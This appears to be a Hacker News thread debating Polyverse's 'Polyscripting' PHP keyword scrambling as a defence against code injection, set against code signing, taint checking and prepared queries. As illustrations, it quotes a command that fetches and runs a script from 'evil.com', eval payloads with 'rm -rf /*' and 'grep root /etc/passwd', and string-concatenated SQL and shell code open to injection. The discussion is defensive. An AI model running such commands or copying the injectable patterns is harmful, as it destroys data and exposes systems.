
Polyscripting scrambles programming languages to prevent code injection - jkuria
https://blog.polyverse.io/introducing-polyscripting-the-beginning-of-the-end-of-code-injection-fe0c99d6f199
======
klodolph
This is a bandaid on a sucking chest wound, not a silver bullet. Traditional
defense in depth:

* Run web processes with minimum privileges

* No write access to the directories where your executable runs

* Audits for filesystem access and use of "eval"

* et cetera

The only reason we're entertaining this kind of idea is because people have
legacy apps written in PHP that they need to deal with and keep running. Fine,
but there are problems with this "polyscripting" approach... this looks
substantially worse than, say, doing something more straightforward like
signing your code with a cryptographic key and refusing to execute unsigned
code. In fact, this looks like a hackneyed, amateurish way of doing exactly
that, all while making the debugging experience immeasurably worse. Modifying
PHP to only execute signed code would surely be trivial by comparison.

This a hack that doesn't even need to exist.

~~~
iforgotpassword
So let's get rid of the NX bit, aslr, heck why even run web processes with
minimum privileges as you suggest? Just write exploit free software and launch
them as root.

I don't see how this polyscripting thing is any better or worse than those
dozens of existing mitigation technologies, apart from your point about
debugging.

~~~
imtringued
The problem with this "mitigation" is that it doesn't solve the problem and it
takes away resources and attention from the proper solution. Checking a code
signature on file load is a proven mitigation for preventing the execution of
untrusted code.

~~~
joshuamorton
This doesn't help if the code you're executing changes after execution starts,
or if it is dynamically generated (a sql query).

------
kevingadd
Why go through all this trouble when you could just use code-signing? Only
load and run source or executable files with a trusted certificate. For more
robustness you generate a self-signed cert on the build server that no outside
parties have access to.

Dedicated interpreter/script pair is a cool idea, at least. The "impossible"
also seems like an overstatement to me - it doesn't seem hard to reverse
engineer the scramble that was applied, since there are frequently ways to get
the ability to read the raw source of the file being executed (certainly
against PHP), and if you can match it against a known source file (easy for
open source libraries) you can use that 1:1 mapping to identify what scramble
was used. Common code patterns show up all the time in source, and since the
scramble preserves literals and structure it will be easy to identify the
scrambled token based on the pattern.

The sad thing is even if this ends up being a great defensive technique,
deploying it in practice would be a real pain because you're not running
known-good packages or installers anymore, you have to build your own
dedicated runtime/interpreter from scratch to match the scramble on your
application. To avoid high risk, you probably need to change the scramble
regularly, which means building the interp again. And if you use a different
scramble per application (for sandboxing, etc) then you aren't getting page
sharing between the native modules. :(

~~~
stevekemp
>Only load and run source or executable files with a trusted certificate

This kind of solution works well with the exception of pretty much any
scripting-language. For example I hacked up a cute linux security module to
allow executions by the kernel to be validated via userspace:

[https://github.com/skx/linux-security-
modules/tree/master/se...](https://github.com/skx/linux-security-
modules/tree/master/security/can-exec)

You could also use SELinux, AppArmor, and similar traditional approaches. Once
you've picked a solution you could then go on to sign `/bin/ls`, `/bin/bash`,
etc, and deny the execution of unsigned binaries such that this would fail:

    
    
         wget evil.com/root.sh
         chmod 755 root.sh
         ./root.sh
    

(This example assumes that you'd even permit `wget` and `chmod` to run.)

However the approach fails if you want to allow running perl, php, python-
scripts, etc. You'd have to sign the interpreters so that they could run. But
if you allow `python` to execute then there is no difference between:

    
    
          python /path/to/good.py
    

and

    
    
          python /path/to/evil.py
    

Since the executable in both cases is `python`, not the script. You'd have to
hack the interpeters to do signature validation on your scripts - and if you
did that you'd almost certainly need to update all the standard-libraries to
allow those to be loaded.

(It is possible you could work around this via policies, but off the top of my
head ..)

~~~
kevingadd
You'd codesign the scripts, yeah. I've done that before when using an
interpreter. It's not trivial but all the major script runtimes that matter
have relevant embedding hooks to let you do it.

~~~
stevekemp
Presumably you'd need to do more than sign/check the script running as the
argument though?

For example:

    
    
         #!/usr/bin/perl
         use module;
         print "OK\n";
    

The module could have been modified by a local user too - so you need to check
all libraries that are included/opened too? That would seem to be a lot of
work.

------
phyzome
Orrrrr you could systemically remove code injection vulnerabilities, which
honestly aren't that hard to get rid of. Why play around with weird little
hacks like this if you can remove the problem at its root?

Just say no to string concatenation of command languages.

------
mncharity
I once served a mostly-unmaintained world-writable wiki. It was getting hosed
by automated link spam. Simply renaming the "edit" url to "ed1t", solved the
problem for several years. It forced a human to eyeball the site, and thus to
notice its high-profile warning that "robots.txt blocks indexing, so link
spamming won't be of any use to you". Eventually someone started spamming
anyway... which eventually obscured the warning... and the site was then
trashed. Sometimes even a very small work function can be quite useful.

------
nneonneo
I don’t understand how this “prevents code injection” in any meaningful way.
The blog post boasts on and on about how it’s going to solve the problem - but
at the end of the day, a code injection bug is still a code injection bug.
Sure, the attacker now has to program in a demented, randomized dialect of
PHP, but given enough patience they’re bound to get something usable running.

Plus this breaks practically any code that actually relies on dynamic PHP
features to generate code, because now the code generators have to be manually
edited to spit out obfuscated code instead of normal PHP.

------
ben509
> Once php is scrambled and the files transformed, there is no key or magic
> value to find that will reverse the process.

Isn't scrambled code standard practice when you're writing PHP?

(I keed, I keed...)

~~~
sli
No no, that would be Perl.

~~~
rbanffy
Perl code is a one-way hash of the program steps.

------
chubot
Uh, so doesn't this only prevent PHP injection? To prevent SQL injection you
would need to change the database itself; to prevent JavaScript injection you
would need to change the browser (impossible), etc.

~~~
stcredzero
_To prevent SQL injection_

Prepared queries?

~~~
CGamesPlay
> Prepared queries?

Well, there are lots of ways to prevent code injection that aren't "scrambling
the AST". But to "polyscript" your SQL, you have to modify your SQL engine.

~~~
stcredzero
I am thinking of using something like this to enable serverless lambdas, but
in ahead of time compiled languages.

------
duckerude
> Within the tests/evalExploit directory, there is a php file that runs eval()
> on user input, a common code-injection vulnerability, to experience the
> power of Polyscripting.

What happens if you eval "`rm -rf /*`;" or "`grep root /etc/passwd`;"? Does it
scramble backticks?

~~~
notveryrational
I doubt it scrambles backticks. In its example on the webpage it just creates
a keywork scrambler. The grammar is intact with most of the lexing.

------
tetrep
TL;DR: This doesn't really do what it claims to do (prevent injection), but it
does _slightly_ mitigate _some_ attack vectors. It's security through
obscurity, which is useful as defense in depth (see: ASLR), but hardly stops
all attacks (or even a motivated attacker). If someone ran around declaring
the end of buffer overflow exploits because of ASLR, I'd have a hearty
chuckle.

    
    
        root:/pwd# cat scrambled.php
        <?php
        arFktyO “Hello, “;
        arFktyO “Small World.\n”;
        ?>
    

In the above example, arFktyO = echo. This doesn't fix (imo) the most common
instance of [something]-injection, which usually stems from string
concatenation, i.e.

    
    
        sqlQuery = "SELECT * FROM table WHERE owner=" + userInput
        execute(sqlQuery)
    

or

    
    
        command = "ls " + userInput
        eval(command)

~~~
ben509
You don't need a particularly advanced DBMS to create a schema with views that
have scrambled names, or just stored procedures with scrambled names.

    
    
        CREATE VIEW oijweojf AS SELECT thing AS woeifj, stuff AS pokkx 
    

Similarly, if you're shelling out, you can certainly set up a chroot jail with
all the names scrambled.

That said, you then need to integrate all this into a build and deploy
process, and god help anyone who has to debug it.

~~~
hyperhopper
scrambling those names is equivalent to scrambling variable names. The actual
use of this tool would be the equivalent of scrambling `CREATE VIEW` to `kdjal
fjdskalf`

------
csirac2
I wish folks would use the taint mode they might already have. At some point
taint checking bugs stopped being release blockers in core ruby & perl, but
having worked through moving a couple of large codebases to surviving strict
taint checking in prod, it's one of the most memorable systematic things we
have to avoid (I think most?) of the bugs in the class that this is trying to
solve.

Obviously, we want solutions that will remediate existing code unmodified, and
I guess enabling taint mode isn't in that category.

I wonder what bugs taint checking wouldn't catch, that this would.

------
tomc1985
The name of this "technique" is a marketing grab. "Polyscripting" means
something that is not this, on its own.

------
codedokode
It looks like a solution to a very rare case - using eval on user input (who
does that?). It doesn't protect you from more popular SQL injections, XSS,
XSRF vulns etc.

The better use would be obfucation of code to lock client to your services.

------
rs86
The PR stink is strong with this one.

